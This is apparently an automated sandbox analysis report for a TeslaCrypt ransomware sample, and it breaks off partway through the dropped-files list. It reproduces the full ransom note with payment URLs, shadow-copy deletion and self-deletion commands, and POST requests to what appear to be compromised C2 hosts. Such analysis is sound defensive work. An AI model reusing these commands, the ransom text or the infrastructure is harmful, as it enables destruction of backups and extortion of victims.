Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

58999b891c...18.exe

windows7-x64

10

58999b891c...18.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    18/10/2024, 17:12 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    58999b891c115ca4cd983c9675724890_JaffaCakes118.exe

  • Size

    376KB

  • MD5

    58999b891c115ca4cd983c9675724890

  • SHA1

    8157379d1d1a40de5dfd00ea70c2cacc6b5d2f5e

  • SHA256

    ae50c1a234d07eb39859cf7aea9361d9b54397d477866ae38bb61ad904298315

  • SHA512

    6773b60e8ad7e940724daf5aa81cd1c08c113b4087c6ff69b21a12fd3c684e441007ab2968780ad5c0425a45ee1b2f3b8f486cc832415ce21f75da0b65e522ed

  • SSDEEP

    6144:ue3rNhMeYq4CGRTs4kadSoKVStcmTVn57CpSCwsUbg62oXd:uY5hMfqwTsTKcmTV5kINEx+d

Score
10/10
teslacryptdefense_evasiondiscoveryexecutionimpactpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+bggqw.txt

Family

teslacrypt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://tt54rfdjhb34rfbnknaerg.milerteddy.com/8558F3F2A5143E52 2. http://kkd47eh4hdjshb5t.angortra.at/8558F3F2A5143E52 3. http://ytrest84y5i456hghadefdsd.pontogrot.com/8558F3F2A5143E52 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser 3. Type in the address bar: xlowfznrg4wf7dli.onion/8558F3F2A5143E52 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://tt54rfdjhb34rfbnknaerg.milerteddy.com/8558F3F2A5143E52 http://kkd47eh4hdjshb5t.angortra.at/8558F3F2A5143E52 http://ytrest84y5i456hghadefdsd.pontogrot.com/8558F3F2A5143E52 *-*-* Your personal page Tor-Browser: xlowfznrg4wf7dli.ONION/8558F3F2A5143E52
URLs

http://tt54rfdjhb34rfbnknaerg.milerteddy.com/8558F3F2A5143E52

http://kkd47eh4hdjshb5t.angortra.at/8558F3F2A5143E52

http://ytrest84y5i456hghadefdsd.pontogrot.com/8558F3F2A5143E52

http://xlowfznrg4wf7dli.ONION/8558F3F2A5143E52

Signatures

  • TeslaCrypt, AlphaCrypt

    Ransomware based on CryptoLocker. Shut down by the developers in 2016.

    ransomwareteslacrypt
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (433) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Deletes itself 1 IoCs
  • Drops startup file 6 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\58999b891c115ca4cd983c9675724890_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\58999b891c115ca4cd983c9675724890_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Users\Admin\AppData\Local\Temp\58999b891c115ca4cd983c9675724890_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\58999b891c115ca4cd983c9675724890_JaffaCakes118.exe"
      2⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\dltalnccsvya.exe
        C:\Windows\dltalnccsvya.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\dltalnccsvya.exe
          C:\Windows\dltalnccsvya.exe
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2180
          • C:\Windows\System32\wbem\WMIC.exe
            "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:708
          • C:\Windows\SysWOW64\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
            5⤵
            • System Location Discovery: System Language Discovery
            • Opens file in notepad (likely ransom note)
            PID:2872
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2876
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2876 CREDAT:275457 /prefetch:2
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2708
          • C:\Windows\System32\wbem\WMIC.exe
            "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:476
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\DLTALN~1.EXE
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2568
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\AppData\Local\Temp\58999B~1.EXE
        3⤵
        • Deletes itself
        • System Location Discovery: System Language Discovery
        PID:2812
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1796

Network

  • flag-us
    DNS
    www.big-cola.com
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    www.big-cola.com
    IN A
    Response
    www.big-cola.com
    IN A
    95.211.219.67
  • flag-nl
    POST
    http://www.big-cola.com/imgs/videos/bsts.php
    dltalnccsvya.exe
    Remote address:
    95.211.219.67:80
    Request
    POST /imgs/videos/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: www.big-cola.com
    Content-Length: 645
    Cache-Control: no-cache
    Response
    HTTP/1.1 302 Found
    cache-control: max-age=0, private, must-revalidate
    connection: close
    content-length: 11
    date: Fri, 18 Oct 2024 17:13:54 GMT
    location: http://survey-smiles.com
    server: nginx
    set-cookie: sid=5ae8a1e7-8d74-11ef-8c6d-f68949463857; path=/; domain=.big-cola.com; expires=Wed, 05 Nov 2092 20:28:02 GMT; max-age=2147483647; HttpOnly
  • flag-us
    DNS
    survey-smiles.com
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    survey-smiles.com
    IN A
    Response
    survey-smiles.com
    IN A
    199.59.243.227
  • flag-us
    GET
    http://survey-smiles.com/
    dltalnccsvya.exe
    Remote address:
    199.59.243.227:80
    Request
    GET / HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: survey-smiles.com
    Response
    HTTP/1.1 200 OK
    date: Fri, 18 Oct 2024 17:13:57 GMT
    content-type: text/html; charset=utf-8
    content-length: 1054
    x-request-id: 97b118db-7a80-42ec-9494-6bd72f86aab0
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xsdd8M7M5chhqnrrB0sbDIjikLNSaqd7FdKSM7smXMnzR651qna8/KU7hu7STFpIV9DxKdvN6NAk7xr/Gf56lw==
    set-cookie: parking_session=97b118db-7a80-42ec-9494-6bd72f86aab0; expires=Fri, 18 Oct 2024 17:28:58 GMT; path=/
  • flag-us
    DNS
    ikstrade.co.kr
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    ikstrade.co.kr
    IN A
    Response
  • flag-us
    DNS
    ikstrade.co.kr
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    ikstrade.co.kr
    IN A
  • flag-us
    DNS
    lutheranph.com
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    lutheranph.com
    IN A
    Response
    lutheranph.com
    IN A
    34.70.133.246
    lutheranph.com
    IN A
    35.225.36.88
    lutheranph.com
    IN A
    107.178.223.183
    lutheranph.com
    IN A
    104.155.138.21
  • flag-us
    POST
    http://lutheranph.com/wp-content/uploads/bsts.php
    dltalnccsvya.exe
    Remote address:
    34.70.133.246:80
    Request
    POST /wp-content/uploads/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: lutheranph.com
    Content-Length: 645
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Content-Length: 0
  • flag-us
    DNS
    hongsi.com
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    hongsi.com
    IN A
    Response
    hongsi.com
    IN A
    110.45.144.173
  • flag-kr
    POST
    http://hongsi.com/whiteboard_dangam/admin/bsts.php
    dltalnccsvya.exe
    Remote address:
    110.45.144.173:80
    Request
    POST /whiteboard_dangam/admin/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: hongsi.com
    Content-Length: 645
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Date: Fri, 18 Oct 2024 17:14:02 GMT
    Server: Apache
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1
  • flag-us
    DNS
    dustywinslow.com
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    dustywinslow.com
    IN A
    Response
  • flag-us
    DNS
    lovemydress.pl
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    lovemydress.pl
    IN A
    Response
  • flag-nl
    POST
    http://www.big-cola.com/imgs/videos/bsts.php
    dltalnccsvya.exe
    Remote address:
    95.211.219.67:80
    Request
    POST /imgs/videos/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: www.big-cola.com
    Content-Length: 645
    Cache-Control: no-cache
    Cookie: sid=5ae8a1e7-8d74-11ef-8c6d-f68949463857
    Response
    HTTP/1.1 302 Found
    cache-control: max-age=0, private, must-revalidate
    connection: close
    content-length: 11
    date: Fri, 18 Oct 2024 17:14:17 GMT
    location: http://survey-smiles.com
    server: nginx
  • flag-us
    GET
    http://survey-smiles.com/
    dltalnccsvya.exe
    Remote address:
    199.59.243.227:80
    Request
    GET / HTTP/1.1
    Cookie: parking_session=97b118db-7a80-42ec-9494-6bd72f86aab0
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: survey-smiles.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    date: Fri, 18 Oct 2024 17:14:18 GMT
    content-type: text/html; charset=utf-8
    content-length: 1054
    x-request-id: ca93442d-ce13-4f92-8908-51840b89b1b9
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xsdd8M7M5chhqnrrB0sbDIjikLNSaqd7FdKSM7smXMnzR651qna8/KU7hu7STFpIV9DxKdvN6NAk7xr/Gf56lw==
    set-cookie: parking_session=97b118db-7a80-42ec-9494-6bd72f86aab0; expires=Fri, 18 Oct 2024 17:29:18 GMT
  • flag-us
    POST
    http://lutheranph.com/wp-content/uploads/bsts.php
    dltalnccsvya.exe
    Remote address:
    34.70.133.246:80
    Request
    POST /wp-content/uploads/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: lutheranph.com
    Content-Length: 645
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Content-Length: 0
  • flag-kr
    POST
    http://hongsi.com/whiteboard_dangam/admin/bsts.php
    dltalnccsvya.exe
    Remote address:
    110.45.144.173:80
    Request
    POST /whiteboard_dangam/admin/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: hongsi.com
    Content-Length: 645
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Date: Fri, 18 Oct 2024 17:14:19 GMT
    Server: Apache
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1
  • flag-us
    DNS
    lovemydress.pl
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    lovemydress.pl
    IN A
    Response
  • 95.211.219.67:80
    http://www.big-cola.com/imgs/videos/bsts.php
    http
    dltalnccsvya.exe
    1.1kB
     569 B
     5
    5

    HTTP Request

    POST http://www.big-cola.com/imgs/videos/bsts.php

    HTTP Response

    302
  • 199.59.243.227:80
    http://survey-smiles.com/
    http
    dltalnccsvya.exe
    561 B
     2.5kB
     8
    7

    HTTP Request

    GET http://survey-smiles.com/

    HTTP Response

    200
  • 34.70.133.246:80
    http://lutheranph.com/wp-content/uploads/bsts.php
    http
    dltalnccsvya.exe
    1.1kB
     250 B
     5
    5

    HTTP Request

    POST http://lutheranph.com/wp-content/uploads/bsts.php

    HTTP Response

    200
  • 110.45.144.173:80
    http://hongsi.com/whiteboard_dangam/admin/bsts.php
    http
    dltalnccsvya.exe
    2.1kB
     602 B
     7
    5

    HTTP Request

    POST http://hongsi.com/whiteboard_dangam/admin/bsts.php

    HTTP Response

    404
  • 95.211.219.67:80
    http://www.big-cola.com/imgs/videos/bsts.php
    http
    dltalnccsvya.exe
    1.2kB
     416 B
     5
    5

    HTTP Request

    POST http://www.big-cola.com/imgs/videos/bsts.php

    HTTP Response

    302
  • 199.59.243.227:80
    http://survey-smiles.com/
    http
    dltalnccsvya.exe
    525 B
     2.4kB
     6
    5

    HTTP Request

    GET http://survey-smiles.com/

    HTTP Response

    200
  • 34.70.133.246:80
    http://lutheranph.com/wp-content/uploads/bsts.php
    http
    dltalnccsvya.exe
    1.1kB
     250 B
     5
    5

    HTTP Request

    POST http://lutheranph.com/wp-content/uploads/bsts.php

    HTTP Response

    200
  • 110.45.144.173:80
    http://hongsi.com/whiteboard_dangam/admin/bsts.php
    http
    dltalnccsvya.exe
    1.1kB
     522 B
     5
    3

    HTTP Request

    POST http://hongsi.com/whiteboard_dangam/admin/bsts.php

    HTTP Response

    404
  • 8.8.8.8:53
    www.big-cola.com
    dns
    dltalnccsvya.exe
    62 B
     78 B
     1
    1

    DNS Request

    www.big-cola.com

    DNS Response

    95.211.219.67

  • 8.8.8.8:53
    survey-smiles.com
    dns
    dltalnccsvya.exe
    63 B
     79 B
     1
    1

    DNS Request

    survey-smiles.com

    DNS Response

    199.59.243.227

  • 8.8.8.8:53
    ikstrade.co.kr
    dns
    dltalnccsvya.exe
    120 B
     124 B
     2
    1

    DNS Request

    ikstrade.co.kr

    DNS Request

    ikstrade.co.kr

  • 8.8.8.8:53
    lutheranph.com
    dns
    dltalnccsvya.exe
    60 B
     124 B
     1
    1

    DNS Request

    lutheranph.com

    DNS Response

    34.70.133.246
    35.225.36.88
    107.178.223.183
    104.155.138.21

  • 8.8.8.8:53
    hongsi.com
    dns
    dltalnccsvya.exe
    56 B
     72 B
     1
    1

    DNS Request

    hongsi.com

    DNS Response

    110.45.144.173

  • 8.8.8.8:53
    dustywinslow.com
    dns
    dltalnccsvya.exe
    62 B
     135 B
     1
    1

    DNS Request

    dustywinslow.com

  • 8.8.8.8:53
    lovemydress.pl
    dns
    dltalnccsvya.exe
    60 B
     60 B
     1
    1

    DNS Request

    lovemydress.pl

  • 8.8.8.8:53
    lovemydress.pl
    dns
    dltalnccsvya.exe
    60 B
     60 B
     1
    1

    DNS Request

    lovemydress.pl

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

1
T1047

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Indicator Removal

2
T1070

File Deletion

2
T1070.004

Modify Registry

3
T1112

Credential Access

Credentials from Password Stores

1
T1555

Credentials from Web Browsers

1
T1555.003

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Discovery

System Information Discovery

1
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Data from Local System

1
T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

1
T1490

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+bggqw.html
    Filesize

    7KB

    MD5

    4083d66aadd6527755496b7b4da5b919

    SHA1

    283172e7dc7800504c582e85de9a4cc58c60fa75

    SHA256

    50eacf7e431c33dddb7075f740ff475979c6a2d96058cd6804861d0e26d228f8

    SHA512

    f4553ea2e944972e4066a32249c61e295e665cfb718e202f76fc1173d4d1eea373ead04e3532bef7ca9fb3a2ceb1a090c114ec22c094049cd3fc5647baed7c5f

    Download Submit

  • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+bggqw.png
    Filesize

    63KB

    MD5

    92067a4884ba3a8024e7c48e6961adf1

    SHA1

    cebd6004da125df3612050087457dfa4fcd92ae6

    SHA256

    e88015f8ed3c0c33ee8f68292fb2abfa86c03a2fc449bf2f84ccaf8ec79da3e3

    SHA512

    d029a4e5a303543acf58b194d823c98a391b9a8bcf1e037f29a5c1c26d66d13785965ded649e71ab5b8bb3dd3ecc26c928b57ce8ebb1aede587abedeebc14241

    Download Submit

  • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+bggqw.txt
    Filesize

    1KB

    MD5

    ee9b5e948d2d92a05c08ee0af62af5e7

    SHA1

    44ec99c10d2231689984a3551aa6bca1e368fddc

    SHA256

    81781e36f1fdea14469ce18e74fcdfdd8525d013cb755fd73523d25aea95a877

    SHA512

    0f461b10a6ad4ca2de84413156e29c5c8de43f55e3ba0f7a28adbac8bb4abc4d48cb8379dfcb864a775144df17abe883d2ca4dc91c8128ce00ccc4fbdb39657c

    Download Submit

  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt
    Filesize

    11KB

    MD5

    e380582c80a64a2110b1c533b54ee396

    SHA1

    da18e950980979bf1afcbffff1f24296d73652a6

    SHA256

    c3437b4078239dd282ea5e8f77f40f605b690623759210057ece97af306e74fa

    SHA512

    419180b2460d63bec96a86fcf6ae840e123426ba8744506d8f0f682fe1a41eb1f5430738f16f802825e1ba8433978ecf22bfb14f8f057fa0abe9e9ff4a5f801a

    Download Submit

  • C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt
    Filesize

    109KB

    MD5

    7b3567d6e7700ffcbe7416a8c7d8f595

    SHA1

    cf32da5c8adab378bdebb1cc1170ee674d72769e

    SHA256

    5458b349d5267d72179f5a83f8485a0ba0a39eb9d3d5de8af84c8036acb46880

    SHA512

    346d8ec654e5fdcca8305b3e1d04b7c9c86433aca3bee85038ff14075e3e20c7dc58165f20c4f04eed5a24381c2bf2c329f9c9785b29bf3c13e4c312c90d2dd9

    Download Submit

  • C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt
    Filesize

    173KB

    MD5

    2712a3ea0d181079dc596667500c2aaf

    SHA1

    567f0acb21303e2e7f9050e3d9c49462f339124c

    SHA256

    4bfd2076045f0fc31c62f70742d4893578047a9d74c57fb242303fd628ed6639

    SHA512

    7f9225ee9fb4ecab4eff2a745075a446da3ce788068994f8416950b16adc51714e24ff528c4251c72f27ae6a6b43fc93c10b726d7cf4f309886a0aa0e92353b8

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    c9451d09cdd91366748b510d5a65df1f

    SHA1

    2be15bdc83fd28749d056cf40d53ce9d4b88263c

    SHA256

    6a3aade0193565e03f7b466a941b9300da5db27ea007e50bd7298b7d871c437a

    SHA512

    8aa809f3e5db322bf0ca6a98ebfaa8a3b471b0560ddcb6ed1b5b8c76f5c38dc1227b177a5c65582a5138967daacf6d6324c798f3d5c678561043861e1086d7e5

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    a9fe2314a9212ded529c2386683d874b

    SHA1

    6aee1cedd1c13bcd5efeff0109d03cc8a7ede79d

    SHA256

    3a76a22471c754a597a9e1bb28ad1dd4857ede82422d485fcbd2b93d210039c5

    SHA512

    59de641a574ef7a2196e8c80c987a6dd64b6150580c87560fcc8abb35a0b491fb8437869fb0f0d0e0535e39657d1ed79c25b26c1d21578ba539c6066b626d934

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    6d2fa9650d5027b34adc6815ebd19237

    SHA1

    33c181baf3956e6379c9d28164d83e43a67effc8

    SHA256

    971b3942aa52f984eb6c1a8d18147692b2b55e4494c7d604816fd6d804fcf18f

    SHA512

    83b8ce4149ad3f15becc8059ba6a74227f7eb0154df570d9d87348edcd2b9ae2a1ff26f8bfe98e1bc665e8fefd17e5778ff9bde33889232c8bb6af248b30b100

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    29f1ed747719a840a11674e54ad71c64

    SHA1

    93341799ffbd980e589e0b3696bd750fd2bd1cd8

    SHA256

    09a85724ea4603354c89dff029d4b73ae7218fa976a12b80d968734eddcfc4bf

    SHA512

    0e03dc2cfd14183de802dbc6b86c85f7a7fa2f68750c6f54633910bb49979236c4fa76bfa58f37f7485b18a48a708ab6e2d73f6947e4451a10d70bf01a621360

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    f6b01118d5adecbbcf2d513c66ec2273

    SHA1

    f51ff7efb8d1f9a1fdcaff932086b10a0327ddcf

    SHA256

    5291b9ee2728993cfcb3c21b00acf0af7e1b82b7b46f1cca8184c4dd14d39da6

    SHA512

    91ec0ecdf43e7ec484e1f46e6dc3468abf56e79b9fb056ae294fc932a3d1ef732a085c00a35e6af4610cf808c9fd3f599896f7a94392d905d3cc0e9dd910e119

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    95ab38e56d800de97d0508a64944f6f5

    SHA1

    f1194c4523055c3fa5133660b53c551256f1d3e8

    SHA256

    e7bea4a666ad3a7344423003978a07a4c4509e29146ade21f00c724ec39198cf

    SHA512

    1a01e681bde399aaa14191999c5d83923135d366f3ba5647f18016a0a1925f00047b2c401d5bdee9f0a29001e295df69865efe407165b8a522196d9c4ef6d535

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    fbcf32b156e06b27b07bc5cc25a35ee4

    SHA1

    0b3ad67a2cb233af33cd9556d3e70eaf16d0339f

    SHA256

    d50af66bfcdcb816e49442b01ca8ddf9853dc6b332c2a38a3b04a5332207e911

    SHA512

    b08c1f23b2cbc41633ef09ab301b2a3b085f26097609c66fe9f2db61beeb62009c1efc792883f33bff20ab0fd9aff2497ab2f01bfc35df5561446e0a210d4b6d

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    36f92afb7612656dccb699206943ab41

    SHA1

    60ff068f03e5554f30eb2602faf64909dab775c7

    SHA256

    7e9704ff65e923dce4d61a8c8a4d20e6542ddd79f4320cd605d5b2a44ea90516

    SHA512

    1c5a85d6725f6770daf2db7544a5e6d09e2e8d7fa8b2c88d9ed27e305b1835ab660629f6ffefddd18642b7f73d87be6750311ed38ba384b76335ef78c488ce66

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    13df47a146fb8c03d218995c89b43e4f

    SHA1

    6e3d477d4db0127cd515e68fb35572f6c1d1a2ee

    SHA256

    c294c7aa475327326d53e25700bb8e88b6aa37b04095204f60c5059331067ae2

    SHA512

    6c6573a1bc91834ee99f49c87e01d7b620fb14f3d271a627f61c888dde2ce1c1b125d8b0223ac4cfb637ca48fa2aaba205dd2d3d0e2568359a4d15b00b82a277

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab125A.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar12DB.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Windows\dltalnccsvya.exe
    Filesize

    376KB

    MD5

    58999b891c115ca4cd983c9675724890

    SHA1

